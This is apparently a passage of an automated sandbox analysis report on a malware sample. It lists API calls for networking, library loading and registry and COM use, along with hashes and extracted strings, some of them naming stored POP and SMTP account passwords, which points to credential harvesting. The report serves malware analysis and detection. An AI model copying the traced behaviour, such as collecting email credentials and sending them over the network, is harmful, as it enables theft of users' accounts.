                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3676486918-0
                                      • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                      • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 82 404df3-404e16 WSAStartup
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                                      APIs
                                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                      • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                                      APIs
                                      • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                      • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                      • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                      • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                                      APIs
                                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                      • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                      • String ID:
                                      • API String ID: 1312198159-0
                                      • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                      • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                      • API String ID: 0-2111798378
                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                      APIs
                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
                                      • API String ID: 1507349165-0
                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _wmemset$ErrorLast
                                      • String ID: IDA$IDA
                                      • API String ID: 887189805-2020647798
                                      • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                      • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_ZeJFfrYmOnJKS.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: freeaddrinfogetaddrinfosocket
                                      • String ID:
                                      • API String ID: 2479546573-0
                                      • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                      • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98